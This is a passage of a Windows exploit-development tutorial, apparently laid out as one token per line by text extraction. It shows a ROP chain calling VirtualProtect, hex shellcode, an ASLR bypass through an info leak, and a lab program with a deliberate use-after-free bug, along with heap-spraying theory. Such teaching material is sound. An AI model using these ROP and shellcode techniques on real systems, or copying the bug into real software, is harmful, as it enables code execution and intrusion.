E)
 
        
msvcr120
 
+
 
0xbedae
,
  
# POP EDX # RETN [MSVCR120.dll]
 
        
0x01010141
,
 
        
ntdll
 
+
 
0x75b23
,
     
# POP EDI # RETN [ntdll.dll]
 
        
0xfefefeff
,
 
        
msvcr120
 
+
 
0x39b41
,
  
# ADD EDX,EDI # RETN [MSVCR120.dll]
 
 
msvcr120
 
+
 
0xdb6c4
,
  
# POP ECX # RETN [MSVCR120.dll]
 
        
kernel32
 
+
 
0xe0fce
,
  
# &Writable location [kernel32.dll]
 
        
ntdll
 
+
 
0x75b23
,
     
# POP EDI # RETN [ntdll.dll]
 
        
msvcr120
 
+
 
0x68e3d
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
        
msvcr120
 
+
 
0x6e150
,
  
# POP ESI
 # RETN [MSVCR120.dll]
 
        
ntdll
 
+
 
0x2e8ae
,
     
# JMP [EAX] [ntdll.dll]
 
        
msvcr120
 
+
 
0x50464
,
  
# POP EAX # RETN [MSVCR120.dll]
 
        
msvcr120
 
+
 
0xe51a4
,
  
# address of ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
        
msvcr120
 
+
 
0xbb7f9
,
  
# PU
SHAD # RETN [MSVCR120.dll]
 
        
kernel32
 
+
 
0x37133
,
  
# ptr to 'call esp' [kernel32.dll]
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_file
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
readable
 
=
 
struct
.
pack
(
'<I'
,
 
kernel32
)
 
        
ret_eip
 
=
 
struct
.
pack
(
'<I'
,
 
kernel32
 
+
 
0xb7805
)
            
# RETN
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x
0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x4
5"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x84
\
xc0"
 
+
 
        
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 163 
-
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x89
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
x
c3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
name
 
=
 
'a'
*
32
 
+
 
readable
 
+
 
'a'
*
8
 
+
 
ret_eip
 
+
 
create_rop_chain
()
 
+
 
shellcode
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
name.dat'
)
 
 
Run the script and then run 
exploitme4.exe
 and exit from it by typing “
n
” at the prompt. If you did everything 
correctly, the calculator should pop up. We did it!
 
Exploiting the info leak
 
Now let’s assume we don’t know the ba
se addresses of 
kernel32.dll
, 
ntdll.dll
 and 
msvcr120.dll
 and that we 
want to determine them by relying on 
exploitme4.exe
 alone (so that we could do that even from a remote PC 
if 
exploitme4.exe
 was offered as a remote service).
 
From the source code of 
explo
itme4
, we can see that 
ptr
 initially points to the beginning of the array 
name
:
 
C++
 
 
class
 
Name
 
{
 
    
char
 
name
[
32
];
 
    
int
 
*
ptr
;
 
 
public
:
 
    
Name
()
 
:
 
ptr
((
int
 
*)
name
)
 
{}
 
<
snip
>
 
};
  
 
We want to read the pointer to the VFTable, but even if we can contro
l 
ptr
 and read wherever we want, we 
don’t know the address of 
name
. A solution is that of performing a 
partial overwrite
. We’ll just overwrite the 
least significant byte of 
ptr
:
 
Python
 
 
def
 
write_file
(
lsb
):
 
    
with
 
open
(
r'c:
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
       
name
 
=
 
'a'
*
32
 
+
 
chr
(
lsb
)
 
        
f
.
write
(
name
)
 
 
write_file
(
0x80
)
 
 
If the initial value of 
ptr
 was 
0xYYYYYYYY
, after the overwrite, 
ptr
 is equal to 
0xYYYYYY80
. Now let’s run 
exploitme4.exe
 (directly, without WinDbg):
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 164 
-
 
Reading name from file...
 
Hi, aaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaÇ°&!
 
 0x01142148 0x00000000 0x6cace060 0x0000000b 0x0026f87c 0x00000021 0x0026f924 0x
 
6ca0a0d5]
 
Do you want to read the name again? [y/n]
 
As we can see, the first 
8
 dwords starting from the address indicated by 
ptr
 are
 
0x01142148 0x
00000000 0x6cace060 0x0000000b 0x0026f87c 0x00000021 0x0026f924 0x6ca0a0d5
 
There’s no trace of the “
a
“s (
0x61616161
) we put in the buffer 
name
, so we must keep searching. Let’s try 
with 
0x60
:
 
write_file(0x60)
 
After updating 
name.dat
, press ‘
y
‘ in the conso
le of 
exploitme4.exe
 and look at the portion of memory 
dumped. Since 
exploitme4.exe
 shows 
0x20
 bytes at a time, we can increment or decrement ptr by 
0x20
. 
Let’s try other values (keep pressing ‘
y
‘ in the console after each update of the file 
name.dat
):
 
wri
te_file(0x40)
 
write_file(0x20)
 
write_file(0x00)
 
write_file(0xa0)
 
write_file(0xc0)
 
The value 
0xc0
 does the trick:
 
Reading name from file...
 
Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
└°&!
 
 0x00000000 0x0026f8cc 0x011421a0 0x61616161 0x61616161 0x61616161 0x6161616
1 0x
 
61616161]
 
Do you want to read the name again? [y/n]
 
It’s clear that 
0x011421a0
 is the pointer to the VFTable. Now let’s read the contents of the VFTable:
 
Python
 
 
def
 
write_file
(
ptr
):
 
    
with
 
open
(
r'c:
\
name.dat'
,
 
'wb'
)
 
as
 
f
:
 
        
name
 
=
 
'a'
*
32
 
+
 
st
ruct
.
pack
(
'<I'
,
 
ptr
)
 
        
f
.
write
(
name
)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 165 
-
 
 
write_file
(
0x011421a0
)
 
 
By pressing ‘
y
‘ again in the console, we see the following:
 
Reading name from file...
 
Hi, aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaá!¶
☺☺!
 
 0x01141000 0x01141020 0x00000048 0x00000000 0x00000000 0x00000000 0x00000000 0x
 
00000000]
 
Do you want to read the name again? [y/n]
 
The two pointers to the virtual functions are 
0x01141000
 and 
0x01141020
. We saw that the RVA to the
 first 
one is 
0x1000
, therefore the base address of 
exploitme4
 is
 
0:000> ? 01141000 
-
 1000
 
Evaluate expression: 18087936 = 01140000
 
Now it’s time to use what we know about the IAT of 
exploitme4.exe
:
 
@exploitme4 + 00002000    kernel32 + 00014a25
 
@exploitme4
 + 00002004    ntdll + 00039dd5
 
@exploitme4 + 00002024    msvcr120 + 000a4ced
 
Because we’ve just found out that the base address of 
exploitme4.exe
 is 
0x01140000
, we can write
 
@0x1142000    kernel32 + 00014a25
 
@0x1142004    ntdll + 00039dd5
 
@0x1142024    ms
vcr120 + 000a4ced
 
Let’s overwrite 
ptr
 with the first address:
 
write_file(0x1142000)
 
By pressing ‘
y
‘ in the console we get:
 
Reading name from file...
 
Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
 
 
0x76334a25
 
0x770f9dd5
 0x763334c9 0x76331420 0x763311f8 0x763316f1 0x
7710107b 0x
 
763351fd]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 166 
-
 
Do you want to read the name again? [y/n]
 
We get two values: 
0x76334a25
 and 
0x770f9dd5
.
 
We need the last one:
 
write_file(0x1142024)
 
By pressing ‘
y
‘ in the console we get:
 
Reading name from file...
 
Hi, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$
 ¶
☺☺!
 
 
0x6ca94ced
 0x6ca6bb8d 0x6ca1e25f 0x6ca1c7ce 0x6ca24293 0x6ca6bbb8 0x6ca24104 0x
 
6ca955eb]
 
Do you want to read the name again? [y/n]
 
The final value is 
0x6ca94ced
.
 
So we have
 
@0x1142000    kernel32 + 00014a25 = 0x76334a25
 
@0x1142004    ntdll + 00039d
d5 = 0x770f9dd5
 
@0x1142024    msvcr120 + 000a4ced = 0x6ca94ced
 
Therefore,
 
kernel32 = 0x76334a25 
-
 0x00014a25 = 0x76320000
 
ntdll = 0x770f9dd5 
-
 0x00039dd5 = 0x770c0000
 
msvcr120 = 0x6ca94ced 
-
 0x000a4ced = 0x6c9f0000
 
Congratulations! We have just bypassed AS
LR!
 
Of course, all this process makes sense when we have remote access to the program but not to the 
machine. Moreover, in an actual exploit all this can and need to be automated. Here, I’m just trying to show 
you the principles and therefore I’ve willingl
y omitted any superflous details which would’ve complicated 
matters without adding any real depth to your comprehension. Don’t worry: when we deal with Internet 
Explorer we’ll see a real exploit in all its glory!
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 167 
-
 
Exploitme5 (Heap spraying & UAF)
 
 
If you haven’t already, read the previous articles (
I
, 
II
, 
III
, 
IV
) before proceeding.
 
For this example you’ll need to disabl
e 
DEP
. In 
VS 2013
, go to 
Project
→
properties
, and modify the 
configuration for 
Release
 as follows:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Data Execution Prevention (DEP)
: No (/NXCOMPAT:NO)
 
The source code of 
exploitme5
 is the following:
 
C++
 
 
#include <conio.h>
 
#include <cstdio>
 
#include
 <cstdlib>
 
#include <vector>
 
 
using
 
namespace
 
std
;
 
 
const
 
bool
 
printAddresses
 
=
 
true
;
 
 
class
 
Mutator
 
{
 
protected
:
 
    
int
 
param
;
 
 
public
:
 
    
Mutator
(
int
 
param
)
 
:
 
param
(
param
)
 
{}
 
 
virtual
 
int
 
getParam
()
 
const
 
{
 
        
return
 
param
;
 
    
}
 
 
vi
rtual
 
void
 
mutate
(
void
 
*
data
,
 
int
 
size
)
 
const
 
=
 
0
;
 
};
 
 
class
 
Multiplier
:
 
public
 
Mutator
 
{
 
    
int
 
reserved
[
40
];
           
// not used, for now!
 
 
public
:
 
    
Multiplier
(
int
 
multiplier
 
=
 
0
)
 
:
 
Mutator
(
multiplier
)
 
{}
 
 
virtual
 
void
 
mutate
(
void
 
*
data
,
 
int
 
size
)
 
const
 
{
 
        
int
 
*
ptr
 
=
 
(
int
 
*)
data
;
 
        
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
size
 
/
 
4
;
 
++
i
)
 
            
ptr
[
i
]
 
*=
 
getParam
();
 
    
}
 
};
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 168 
-
 
 
class
 
LowerCaser
 
:
 
public
 
Mutator
 
{
 
public
:
 
    
LowerCaser
()
 
:
 
Mutator
(
0
)
 
{}
 
 
virtual
 
void
 
mutate
(
void
 
*
data
,
 
int
 
si
ze
)
 
const
 
{
 
        
char
 
*
ptr
 
=
 
(
char
 
*)
data
;
 
        
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
size
;
 
++
i
)
 
            
if
 
(
ptr
[
i
]
 
>=
 
'a'
 
&&
 
ptr
[
i
]
 
<=
 
'z'
)
 
                
ptr
[
i
]
 
-
=
 
0x20
;
 
    
}
 
};
 
 
class
 
Block
 
{
 
    
void
 
*
data
;
 
    
int
 
size
;
 
 
public
:
 
    
Block
(
void
 
*
data
,
 
int
 
size
)
 
:
 
data
(
data
),
 
size
(
size
)
 
{}
 
    
void
 
*
getData
()
 
const
 
{
 
return
 
data
;
 
}
 
    
int
 
getSize
()
 
const
 
{
 
return
 
size
;
 
}
 
};
 
 
// Global variables
 
vector
<
Block
>
 
blocks
;
 
Mutator
 
*
mutators
[]
 
=
 
{
 
new
 
Multiplier
(
2
),
 
new
 
LowerCaser
()
 
};
 
 
void
 
configureMutator
()
 
{
 
    
while
 
(
true
)
 
{
 
        
printf
(
 
            
"1) Multiplier (multiplier = %d)
\
n"
 
            
"2) LowerCaser
\
n"
 
            
"3) Exit
\
n"
 
            
"
\
n"
 
            
"Your choice [1
-
3]: "
,
 
mutators
[
0
]
-
>
getParam
());
 
        
int
 
choice
 
=
 
_getch
();
 
        
pr
intf
(
"
\
n
\
n"
);
 
        
if
 
(
choice
 
==
 
'3'
)
 
            
break
;
 
        
if
 
(
choice
 
>=
 
'1'
 
&&
 
choice
 
<=
 
'3'
)
 
{
 
            
if
 
(
choice
 
==
 
'1'
)
 
{
 
                
if
 
(
printAddresses
)
 
                    
printf
(
"mutators[0] = 0x%08x
\
n"
,
 
mutators
[
0
]);
 
              
delete
 
mutators
[
0
];
 
 
printf
(
"multiplier (int): "
);
 
                
int
 
multiplier
;
 
                
int
 
res
 
=
 
scanf_s
(
"%d"
,
 
&
multiplier
);
 
                
fflush
(
stdin
);
 
                
if
 
(
res
)
 
{
 
                    
mutators
[
0
]
 
=
 
new
 
Mult
iplier
(
multiplier
);
 
                    
if
 
(
printAddresses
)
 
                        
printf
(
"mutators[0] = 0x%08x
\
n"
,
 
mutators
[
0
]);
 
                    
printf
(
"Multiplier was configured
\
n
\
n"
);
 
                
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 169 
-
 
                
break
;
 
            
}
 
         
else
 
{
 
                
printf
(
"LowerCaser is not configurable for now!
\
n
\
n"
);
 
            
}
 
        
}
 
        
else
 
            
printf
(
"Wrong choice!
\
n"
);
 
    
}
 
}
 
 
void
 
listBlocks
()
 
{
 
    
printf
(
"
-------
 Blocks 
-------
\
n"
);
 
    
if
 
(!
printAddresses
)
 
    
for
 
(
size_t
 
i
 
=
 
0
;
 
i
 
<
 
blocks
.
size
();
 
++
i
)
 
            
printf
(
"block %d: size = %d
\
n"
,
 
i
,
 
blocks
[
i
].
getSize
());
 
    
else
 
        
for
 
(
size_t
 
i
 
=
 
0
;
 
i
 
<
 
blocks
.
size
();
 
++
i
)
 
            
printf
(
"block %d: address = 0x%08x; size = %d
\
n"
,
 
i
,
 
blocks
[
i
].
getDa
ta
(),
 
blocks
[
i
].
getSize
());
 
    
printf
(
"
----------------------
\
n
\
n"
);
 
}
 
 
void
 
readBlock
()
 
{
 
    
char
 
*
data
;
 
    
char
 
filePath
[
1024
];
 
 
while
 
(
true
)
 
{
 
        
printf
(
"File path ('exit' to exit): "
);
 
        
scanf_s
(
"%s"
,
 
filePath
,
 
sizeof
(
filePath
));
 
  
fflush
(
stdin
);
 
        
printf
(
"
\
n"
);
 
        
if
 
(!
strcmp
(
filePath
,
 
"exit"
))
 
            
return
;
 
        
FILE
 
*
f
 
=
 
fopen
(
filePath
,
 
"rb"
);
 
        
if
 
(!
f
)
 
            
printf
(
"Can't open the file!
\
n
\
n"
);
 
        
else
 
{
 
            
fseek
(
f
,
 
0L
,
 
SEEK_END
)
;
 
            
long
 
bytes
 
=
 
ftell
(
f
);
 
            
data
 
=
 
new
 
char
[
bytes
];
 
 
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
            
int
 
pos
 
=
 
0
;
 
            
while
 
(
pos
 
<
 
bytes
)
 
{
 
                
int
 
len
 
=
 
bytes
 
-
 
pos
 
>
 
200
 
?
 
200
 
:
 
bytes
 
-
 
pos
;
 
                
fread
(
data
 
+
 
pos
,
 
1
,
 
len
,
 
f
);
 
                
pos
 
+=
 
len
;
 
            
}
 
            
fclose
(
f
);
 
 
blocks
.
push_back
(
Block
(
data
,
 
bytes
));
 
 
printf
(
"Block read (%d bytes)
\
n
\
n"
,
 
bytes
);
 
            
break
;
 
        
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 170 
-
 
    
}
 
}
 
 
void
 
duplicateBlo
ck
()
 
{
 
    
listBlocks
();
 
    
while
 
(
true
)
 
{
 
        
printf
(
"Index of block to duplicate (
-
1 to exit): "
);
 
        
int
 
index
;
 
        
scanf_s
(
"%d"
,
 
&
index
);
 
        
fflush
(
stdin
);
 
        
if
 
(
index
 
==
 
-
1
)
 
            
return
;
 
        
if
 
(
index
 
<
 
0
 
||
 
index
 
>
=
 
(
int
)
blocks
.
size
())
 
{
 
            
printf
(
"Wrong index!
\
n"
);
 
        
}
 
        
else
 
{
 
            
while
 
(
true
)
 
{
 
                
int
 
copies
;
 
                
printf
(
"Number of copies (
-
1 to exit): "
);
 
                
scanf_s
(
"%d"
,
 
&
copies
);
 
               
fflush
(
stdin
);
 
                
if
 
(
copies
 
==
 
-
1
)
 
                    
return
;
 
                
if
 
(
copies
 
<=
 
0
)
 
                    
printf
(
"Wrong number of copies!
\
n"
);
 
                
else
 
{
 
                    
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
copies
;
 
++
i
)
 
{
 
          
int
 
size
 
=
 
blocks
[
index
].
getSize
();
 
                        
void
 
*
data
 
=
 
new
 
char
[
size
];
 
                        
memcpy
(
data
,
 
blocks
[
index
].
getData
(),
 
size
);
 
                        
blocks
.
push_back
(
Block
(
data
,
 
size
));
 
                    
}
 
 
return
;
 
                
}
 
            
}
 
        
}
 
    
}
 
}
 
 
void
 
myExit
()
 
{
 
    
exit
(
0
);
 
}
 
 
void
 
mutateBlock
()
 
{
 
    
listBlocks
();
 
    
while
 
(
true
)
 
{
 
        
printf
(
"Index of block to mutate (
-
1 to exit): "
);
 
        
int
 
index
;
 
        
scanf_s
(
"%d"
,
 
&
index
);
 
        
fflush
(
stdin
);
 
        
if
 
(
index
 
==
 
-
1
)
 
            
break
;
 
        
if
 
(
index
 
<
 
0
 
||
 
index
 
>=
 
(
int
)
blocks
.
size
())
 
{
 
            
printf
(
"Wrong index!
\
n"
);
 
        
}
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 171 
-
 
        
else
 
{
 
            
while
 
(
true
)
 
{
 
                
prin
tf
(
 
                    
"1) Multiplier
\
n"
 
                    
"2) LowerCaser
\
n"
 
                    
"3) Exit
\
n"
 
                    
"Your choice [1
-
3]: "
);
 
                
int
 
choice
 
=
 
_getch
();
 
                
printf
(
"
\
n
\
n"
);
 
                
if
 
(
choice
 
==
 
'3'
)
 
                    
break
;
 
                
if
 
(
choice
 
>=
 
'1'
 
&&
 
choice
 
<=
 
'3'
)
 
{
 
                    
choice
 
-
=
 
'0'
;
 
                    
mutators
[
choice
 
-
 
1
]
-
>
mutate
(
blocks
[
index
].
getData
(),
 
blocks
[
index
].
getSize
());
 
                    
printf
(
"The bl
ock was mutated.
\
n
\
n"
);
 
                    
break
;
 
                
}
 
                
else
 
                    
printf
(
"Wrong choice!
\
n
\
n"
);
 
            
}
 
            
break
;
 
        
}
 
    
}
 
}
 
 
int
 
handleMenu
()
 
{
 
    
while
 
(
true
)
 
{
 
        
printf
(
 
          
"1) Read block from file
\
n"
 
            
"2) List blocks
\
n"
 
            
"3) Duplicate Block
\
n"
 
            
"4) Configure mutator
\
n"
 
            
"5) Mutate block
\
n"
 
            
"6) Exit
\
n"
 
            
"
\
n"
 
            
"Your choice [1
-
6]: "
);
 
        
int
 
ch
oice
 
=
 
_getch
();
 
        
printf
(
"
\
n
\
n"
);
 
        
if
 
(
choice
 
>=
 
'1'
 
&&
 
choice
 
<=
 
'6'
)
 
            
return
 
choice
 
-
 
'0'
;
 
        
else
 
            
printf
(
"Wrong choice!
\
n
\
n"
);
 
    
}
 
}
 
 
int
 
main
()
 
{
 
    
typedef
 
void
(*
funcPtr
)();
 
    
funcPtr
 
functions
[]
 
=
 
{
 
rea
dBlock
,
 
listBlocks
,
 
duplicateBlock
,
 
configureMutator
,
 
mutateBlock
,
 
myExit
 
};
 
 
while
 
(
true
)
 
{
 
        
int
 
choice
 
=
 
handleMenu
();
 
        
functions
[
choice
 
-
 
1
]();
 
    
}
 
 
return
 
0
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 172 
-
 
}
 
 
This program is longer than the previous ones, so let’s talk a li
ttle about it. This program lets you:
 
1
.
 
read a block of data from file;
 
2
.
 
duplicate a block by doing copies of it;
 
3
.
 
transform a block by doing some operations on it.
 
You can transform a block by using a 
mutator
. There are just two mutators: the first is called 
Multiplier
 and 
multiplies the dwords in a block by a multiplier, whereas the second is called 
LowerCaser
 and simply 
trasform 
ASCII
 characters to lowercase.
 
The 
Multiplier
 mutator can be configured, i.e. the multiplier can be specified by the user.
 
UAF
 
This
 program has a bug of type 
UAF
 (
U
se 
A
fter 
F
ree). Here’s an example of a UAF bug:
 
C++
 
 
Object
 
*
obj
 
=
 
new
 
Object
;
 
...
 
delete
 
obj
;
           
// Free
 
...
 
obj
-
>
method
();
        
// Use
 
 
As you can see, 
obj
 is used after it’s been freed. The problem is that in 
C+
+
, objects must be freed manually 
(there is no garbage collector) so, because of a programming error, an object can be freed while it’s still in 
use. After the deallocation, 
obj
 becomes a so
-
called 
dangling pointer
 because it points to deallocated data.
 
Ho
w can we exploit such a bug? The idea is to take control of the portion of memory pointed to by the 
dangling pointer. To understand how we can do this, we need to know how the memory allocator works. We 
talked about the 
Windows Heap
 in the
 
Heap
 section.
 
In a nutshell, the heap maintains lists of free blocks. Each list contains free blocks of a specific size. For 
example, if we need to allocate a block of 
32
 bytes, a block of 
40
 bytes is removed from the appropriate list 
of
 free blocks and returned to the caller. Note that the block is 
40
 bytes because 
8
 bytes are used for the 
metadata
. When the block is released by the application, the block is reinserted into the appropriate list of 
free blocks.
 
Here comes the most importa
nt fact: when the allocator needs to remove a free block from a free list, it 
tends to return the last free block which was inserted into that list. This means that if an object of, say, 
32
 
bytes is deallocated and then another object of 
32
 bytes is alloca
ted, the second object will occupy the same 
portion of memory that was occupied by the first object.
 
Let’s look at an example:
 
C++
 
 
Object
 
*
obj
 
=
 
new
 
Object
;
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 173 
-
 
...
 
delete
 
obj
;
 
Object
 
*
obj2
 
=
 
new
 
Object
;
 
...
 
obj
-
>
method
();
 
 
In this example, 
obj
 and 
obj2
 will 
end up pointing to the same object because the block of memory released 
by 
delete
 is immediately returned by the following 
new
.
 
What happens if instead of another object we allocate an array of the same size? Look at this example:
 
C++
 
 
Object
 
*
obj
 
=
 
new
 
Ob
ject
;
         
// sizeof(Object) = 32
 
...
 
delete
 
obj
;
 
int
 
*
data
 
=
 
new
 
int
[
32
/
4
];
 
data
[
0
]
 
=
 
ptr_to_evil_VFTable
;
 
...
 
obj
-
>
virtual_method
();
 
 
As we saw before when we exploited 
exploitme4
, the first DWORD of an object which has a virtual function 
table is a p
ointer to that table. In the example above, through the UAF bug, we are able to overwrite the 
pointer to the 
VFTable
 with a value of our choosing. This way, 
obj
-
>virtual_method()
 may end up calling our 
payload.
 
Heap Spraying
 
To
 spray the heap
 means filling
 the heap with data we control. In browsers we can do this through 
Javascript
 by allocating strings or other objects. Spraying the heap is a way to put our shellcode in the 
address space of the process we’re attacking. Let’s say we succeed in filling the h
eap with the following 
data:
 
nop
 
nop
 
nop
 
.
 
.
 
.
 
nop
 
shellcode
 
nop
 
nop
 
nop
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 174 
-
 
.
 
.
 
.
 
nop
 
shellcode
 
.
 
.
 
.
 
(and so on)
 
Even if the allocations on the Heap are not completely deterministic, if we put enough data on the heap, and 
the 
nop sleds
 are long enough with r
espect to our shellcode, it’s highly probable that by jumping at a specific 
address on the heap we’ll hit a nop sled and our shellcode will be executed.
 
By studying how the heap behaves, we can even perform 
precise
 heap spraying, so that we don’t need any 
nop sleds.
 
UAF in exploitme5
 
The UAF bug is located in the 
mutateBlock()
 function. Here’s the code again:
 
C++
 
 
void
 
configureMutator
()
 
{
 
    
while
 
(
true
)
 
{
 
        
printf
(
 
            
"1) Multiplier (multiplier = %d)
\
n"
 
            
"2) LowerCaser
\
n"
 
      
"3) Exit
\
n"
 
            
"
\
n"
 
            
"Your choice [1
-
3]: "
,
 
mutators
[
0
]
-
>
getParam
());
 
        
int
 
choice
 
=
 
_getch
();
 
        
printf
(
"
\
n
\
n"
);
 
        
if
 
(
choice
 
==
 
'3'
)
 
            
break
;
 
        
if
 
(
choice
 
>=
 
'1'
 
&&
 
choice
 
<=
 
'3'
)
 
{
 
            
i
f
 
(
choice
 
==
 
'1'
)
 
{
 
                
if
 
(
printAddresses
)
 
                    
printf
(
"mutators[0] = 0x%08x
\
n"
,
 
mutators
[
0
]);
 
                
delete
 
mutators
[
0
];
         
<==========================
 
FREE
 
 
printf
(
"multiplier (int): "
);
 
        
int
 
multiplier
;
 
                
int
 
res
 
=
 
scanf_s
(
"%d"
,
 
&
multiplier
);
 
                
fflush
(
stdin
);
 
                
if
 
(
res
)
 
{
 
                    
mutators
[
0
]
 
=
 
new
 
Multiplier
(
multiplier
);
    
<=======
 
only
 
if
 
res
 
is
 
true
 
                    
if
 
(
pr
intAddresses
)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 175 
-
 
                        
printf
(
"mutators[0] = 0x%08x
\
n"
,
 
mutators
[
0
]);
 
                    
printf
(
"Multiplier was configured
\
n
\
n"
);
 
                
}
 
                
break
;
 
            
}
 
            
else
 
{
 
                
printf
(
"LowerCaser i
s not configurable for now!
\
n
\
n"
);
 
            
}
 
        
}
 
        
else
 
            
printf
(
"Wrong choice!
\
n"
);
 
    
}
 
}
 
 
Look at the two remarks in the code above. This function lets us change the multiplier used by the 
Multiplier
 
mutator, but if we enter a
n invalid value, for instance “
asdf
“, 
scanf_s()
 returns false and 
mutators[0]
 becomes 
a dangling pointer because still points to the destroyed object.
 
Here’s the definition of 
Multiplier
 (and its base class 
Mutator
):
 
C++
 
 
class
 
Mutator
 
{
 
protected
:
 
    
int
 
param
;
 
 
public
:
 
    
Mutator
(
int
 
param
)
 
:
 
param
(
param
)
 
{}
 
 
virtual
 
int
 
getParam
()
 
const
 
{
 
        
return
 
param
;
 
    
}
 
 
virtual
 
void
 
mutate
(
void
 
*
data
,
 
int
 
size
)
 
const
 
=
 
0
;
 
};
 
 
class
 
Multiplier
:
 
public
 
Mutator
 
{
 
    
int
 
reserved
[
40
];
           
/
/ not used, for now!
 
 
public
:
 
    
Multiplier
(
int
 
multiplier
 
=
 
0
)
 
:
 
Mutator
(
multiplier
)
 
{}
 
 
virtual
 
void
 
mutate
(
void
 
*
